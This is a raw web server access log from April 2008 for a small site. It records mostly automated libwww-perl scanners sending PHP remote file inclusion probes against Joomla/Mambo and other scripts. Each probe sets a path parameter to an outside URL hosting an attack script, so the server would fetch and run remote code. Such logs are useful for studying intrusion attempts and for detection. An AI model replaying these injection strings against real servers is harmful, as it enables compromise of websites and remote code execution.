195.155.232.37 - - [30/Apr/2008:12:23:17 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.50.214.191 - - [30/Apr/2008:12:23:23 -0700] "GET /logs/access.log//includes/phpmailer/class.phpmailer.php?mosConfig_absolute_path=http://buycheaperwebhosting.com/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.201.218.158 - - [30/Apr/2008:12:24:06 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.201.218.158 - - [30/Apr/2008:12:24:18 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:24:33 -0700] "GET /logs/xGB.php?act=admin&do=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:24:33 -0700] "GET /xGB.php?act=admin&do=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.243.23 - - [30/Apr/2008:12:24:41 -0700] "GET /logs/access_080308.log/mcf.php?content=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
124.217.243.23 - - [30/Apr/2008:12:24:41 -0700] "GET /mcf.php?content=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
124.217.243.23 - - [30/Apr/2008:12:24:42 -0700] "GET /logs/mcf.php?content=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.32.31.33 - - [30/Apr/2008:12:24:49 -0700] "GET /logs/access.log/!scanhttp://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.50.214.191 - - [30/Apr/2008:12:24:49 -0700] "GET /logs/access_080308.log//includes/phpmailer/class.phpmailer.php?mosConfig_absolute_path=http://buycheaperwebhosting.com/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.32.31.33 - - [30/Apr/2008:12:24:50 -0700] "GET /!scanhttp://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.32.31.33 - - [30/Apr/2008:12:24:50 -0700] "GET /logs/!scanhttp://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:24:56 -0700] "GET /logs/access_080131.log/xGB.php?act=admin&do=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:24:56 -0700] "GET /xGB.php?act=admin&do=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:24:56 -0700] "GET /logs/xGB.php?act=admin&do=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.123 - - [30/Apr/2008:12:25:16 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://cpanelx.yoll.net/m4k.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.19.130 - - [30/Apr/2008:12:25:18 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [30/Apr/2008:12:25:19 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:25:19 -0700] "GET /logs/access_080228.log/xGB.php?act=admin&do=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.123 - - [30/Apr/2008:12:25:20 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://cpanelx.yoll.net/m4k.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [30/Apr/2008:12:25:21 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://cpanelx.yoll.net/m4k.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.32.31.33 - - [30/Apr/2008:12:25:28 -0700] "GET /logs/access_080309.log/!scanhttp://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:25:32 -0700] "GET /logs//selectlang.php?BBC_LANGUAGE_PATH=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:25:33 -0700] "GET //selectlang.php?BBC_LANGUAGE_PATH=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.18.249 - - [30/Apr/2008:12:25:35 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.187 - - [30/Apr/2008:12:25:36 -0700] "GET /plans/A4_SCHEMAIC_SECTION.pdf HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:12:25:56 -0700] "GET /logs/access_080218.log/convert/mvcw.php?step=1&vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.32.31.33 - - [30/Apr/2008:12:26:06 -0700] "GET /logs/!scanhttp://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.32.31.33 - - [30/Apr/2008:12:26:28 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.32.31.33 - - [30/Apr/2008:12:26:28 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.32.31.33 - - [30/Apr/2008:12:26:28 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.207.204.13 - - [30/Apr/2008:12:26:35 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [30/Apr/2008:12:26:36 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.32.31.33 - - [30/Apr/2008:12:27:05 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.1.143 - - [30/Apr/2008:12:27:17 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:27:27 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:27:27 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.254.37.143 - - [30/Apr/2008:12:27:29 -0700] "GET /logs/access_080308.log/mcf.php?content=http://kas.casperhelix.com/phpBB3/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.37.143 - - [30/Apr/2008:12:27:29 -0700] "GET /mcf.php?content=http://kas.casperhelix.com/phpBB3/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.37.143 - - [30/Apr/2008:12:27:29 -0700] "GET /logs/mcf.php?content=http://kas.casperhelix.com/phpBB3/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.151.23.213 - - [30/Apr/2008:12:28:03 -0700] "GET /logs//index.php?option=com_akocomment&task=&Itemid=&mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [30/Apr/2008:12:28:06 -0700] "GET //index.php?option=com_akocomment&task=&Itemid=&mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:12:28:08 -0700] "GET /logs/access_080215.log//components/com_mamblog/showblogs.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:12:28:08 -0700] "GET /logs//components/com_mamblog/showblogs.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
213.27.209.11 - - [30/Apr/2008:12:28:11 -0700] "GET /logs//selectlang.php?BBC_LANGUAGE_PATH=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.27.209.11 - - [30/Apr/2008:12:28:12 -0700] "GET //selectlang.php?BBC_LANGUAGE_PATH=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:12:28:36 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:28:46 -0700] "GET /logs/access_080101.log/index.php?pageurl=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:28:51 -0700] "GET /logs//selectlang.php?BBC_LANGUAGE_PATH=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:28:51 -0700] "GET //selectlang.php?BBC_LANGUAGE_PATH=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.198.149.178 - - [30/Apr/2008:12:28:52 -0700] "GET /logs//selectlang.php?BBC_LANGUAGE_PATH=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [30/Apr/2008:12:28:53 -0700] "GET //selectlang.php?BBC_LANGUAGE_PATH=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:28:53 -0700] "GET /index.php?pageurl=http://simoneleitao.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:28:56 -0700] "GET /logs/index.php?pageurl=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:29:07 -0700] "GET /logs/access_071224.log/index.php?pageurl=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.37.143 - - [30/Apr/2008:12:29:16 -0700] "GET /logs/access_080219.log/mcf.php?content=http://kas.casperhelix.com/phpBB3/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [30/Apr/2008:12:29:32 -0700] "GET /logs//selectlang.php?BBC_LANGUAGE_PATH=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [30/Apr/2008:12:29:33 -0700] "GET //selectlang.php?BBC_LANGUAGE_PATH=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
124.217.243.23 - - [30/Apr/2008:12:29:34 -0700] "GET /logs/access_080219.log/mcf.php?content=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.15.107.13 - - [30/Apr/2008:12:29:39 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:12:29:42 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.15.107.13 - - [30/Apr/2008:12:29:43 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:12:29:50 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.0" 200 11590 "-" "libwww-perl/5.805" "www.dmulk.com"
195.14.1.101 - - [30/Apr/2008:12:30:09 -0700] "GET /logs//selectlang.php?BBC_LANGUAGE_PATH=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.14.1.101 - - [30/Apr/2008:12:30:09 -0700] "GET //selectlang.php?BBC_LANGUAGE_PATH=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.229.176 - - [30/Apr/2008:12:30:20 -0700] "GET /logs/index.php?option=com_rss&=&mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
213.193.229.176 - - [30/Apr/2008:12:30:24 -0700] "GET /index.php?option=com_rss&=&mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/boo.do??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
196.35.158.180 - - [30/Apr/2008:12:30:25 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:30:26 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.35.158.180 - - [30/Apr/2008:12:30:27 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.225.192.249 - - [30/Apr/2008:12:30:34 -0700] "GET /logs//selectlang.php?BBC_LANGUAGE_PATH=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.192.249 - - [30/Apr/2008:12:30:35 -0700] "GET //selectlang.php?BBC_LANGUAGE_PATH=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.186.117.208 - - [30/Apr/2008:12:31:02 -0700] "GET /logs//components/com_akocomment/akocomments.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.186.117.208 - - [30/Apr/2008:12:31:03 -0700] "GET //components/com_akocomment/akocomments.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.32.31.33 - - [30/Apr/2008:12:31:24 -0700] "GET /logs/access.log/trans.php?trans=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.32.31.33 - - [30/Apr/2008:12:31:24 -0700] "GET /trans.php?trans=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.32.31.33 - - [30/Apr/2008:12:31:24 -0700] "GET /logs/trans.php?trans=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.121.106.117 - - [30/Apr/2008:12:31:35 -0700] "GET /logs/access_071129.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.106.117 - - [30/Apr/2008:12:31:36 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.47.36.29 - - [30/Apr/2008:12:31:36 -0700] "GET /logs/access_071129.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.47.36.29 - - [30/Apr/2008:12:31:36 -0700] "GET /logs/access_071129.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.47.36.29 - - [30/Apr/2008:12:31:36 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.47.36.29 - - [30/Apr/2008:12:31:36 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.121.106.117 - - [30/Apr/2008:12:31:36 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:31:36 -0700] "GET /logs/access_080201.log//?php=paginahttp://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.47.36.29 - - [30/Apr/2008:12:31:36 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.47.36.29 - - [30/Apr/2008:12:31:36 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.47.36.29 - - [30/Apr/2008:12:31:36 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.121.106.117 - - [30/Apr/2008:12:31:36 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.47.36.29 - - [30/Apr/2008:12:31:36 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
93.93.112.60 - - [30/Apr/2008:12:31:39 -0700] "GET /logs/access_071129.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:31:39 -0700] "GET //?php=paginahttp://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
93.93.112.60 - - [30/Apr/2008:12:31:39 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:31:40 -0700] "GET /logs//?php=paginahttp://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 45416 "-" "libwww-perl/5.811" "www.dmulk.com"
93.93.112.60 - - [30/Apr/2008:12:31:40 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
93.93.112.60 - - [30/Apr/2008:12:31:40 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
93.93.112.60 - - [30/Apr/2008:12:31:44 -0700] "GET /logs/access_071129.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
93.93.112.60 - - [30/Apr/2008:12:31:44 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
93.93.112.60 - - [30/Apr/2008:12:31:44 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
93.93.112.60 - - [30/Apr/2008:12:31:45 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:31:46 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:31:46 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.235.247.137 - - [30/Apr/2008:12:31:49 -0700] "GET /logs/access_071129.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [30/Apr/2008:12:31:49 -0700] "GET /logs/access_071129.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [30/Apr/2008:12:31:49 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [30/Apr/2008:12:31:50 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [30/Apr/2008:12:31:50 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [30/Apr/2008:12:31:50 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [30/Apr/2008:12:31:50 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [30/Apr/2008:12:31:50 -0700] "GET /logs/access_071118.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:31:54 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:31:54 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.254.37.143 - - [30/Apr/2008:12:32:08 -0700] "GET /logs/access_080218.log//modules/TotalCalendar/about.php?inc_dir=http://kas.casperhelix.com/phpBB3/help.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:12:32:08 -0700] "GET /logs/access_080215.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.168 - - [30/Apr/2008:12:32:10 -0700] "GET /logs/access_071129.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.168 - - [30/Apr/2008:12:32:10 -0700] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.100 - - [30/Apr/2008:12:32:10 -0700] "GET /logs/access_071129.log/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.168 - - [30/Apr/2008:12:32:11 -0700] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
